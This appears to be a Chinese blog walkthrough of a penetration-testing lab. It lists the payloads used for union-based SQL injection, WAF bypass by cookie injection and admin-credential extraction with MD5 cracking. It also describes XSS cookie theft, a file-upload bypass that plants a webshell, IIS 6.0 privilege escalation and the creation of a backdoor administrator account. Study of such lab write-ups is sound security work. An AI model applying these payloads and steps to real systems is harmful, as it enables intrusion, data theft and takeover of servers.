目标网站:http://120.203.13.111:6815/
点击新闻1,发现网址变成了http://120.203.13.111:6815/?id=1,进行了传参,于是尝试注入,输入’ 返回错误
输入http://120.203.13.111:6815/?id=1 and 1=1 返回正常
输入http://120.203.13.111:6815/?id=1 and 1=2 返回错误,从而断定存在注入
存在注入之后,输入and 1=1 order by 1 返回正常 and 1=1 order by 2 返回正常
输入and 1=1 order by 3 时,返回错误,断定字段数位2
于是输入 ?id =3 and 1=1 union select 1,2 发现字段2能在网页中正常显示,这时候插入sql语句?id =3 and 1=1 union select 1,version()发现数据库版本为5.5.53
语句?id=3 and 1=1 union select 1,database()发现数据库名为maoshe
语句?id=3 and 1=1 union select 1,user()发现数据库账号为maoshe@localhost
于是尝试注入数据库表
语句?id=3 and 1=1 union select 1,table_name from information_schema.tables where table_schema=’maoshe’
发现表admin
输入?id=5 union select 1,group_concat(COLUMN_NAME, 0x3c2f62723e) from information_schema.COLUMNS where TABLE_NAME='admin'
发现id,username,password,三个字段
输入?id=5 union select 1,group_concat(username,0x3c2f62723e,password) from admin
发现username=admin password=hellohack
拿到flag
http://120.203.13.111:8001/shownews.asp?id=170%20order%20by%2010 返回正常
http://120.203.13.111:8001/shownews.asp?id=170%20order%20by%2011 返回错误,断定10个字段
http://120.203.13.111:8001/shownews.asp?id=170%20union%20select%201,2,3,4,5,6,7,8,9,10被waf拦截,于是尝试cookie注入
?id=170 union select 1,2,3,4,5,6,7,8,9,10成功
?id=172+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
获得用户名admin 密码b9a2a2b5dffb918c md5查询结果为welcome
登录网站后发现,提示很明显,于是修改cookie和referer,则成功登陆
登陆网站尝试注入<script>alert(/xss/)</script>发现存在跨站漏洞,于是登陆xss9,构造代码,注入,获得管理员cookie,拿到
上传,上传过程先尝试.asp发现不行,于是把jsp和asp文件合成成图片,成功上传后发现不解析,于是尝试更改文件后缀,把.jsp文件后缀更改成.cer,成功上传,成功链接菜刀,拿到shell
执行虚拟终端,尝试net user命令,显示没有权限,于是上传cmd.exe执行net user 发现权限不够,根据iis6.0服务器存在的漏洞,上传iis6.exe,执行net user,发现系统权限,于是创建用户并提升至管理员组,远程链接3389端口,成功远程连接,进入c盘拿到shell。
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.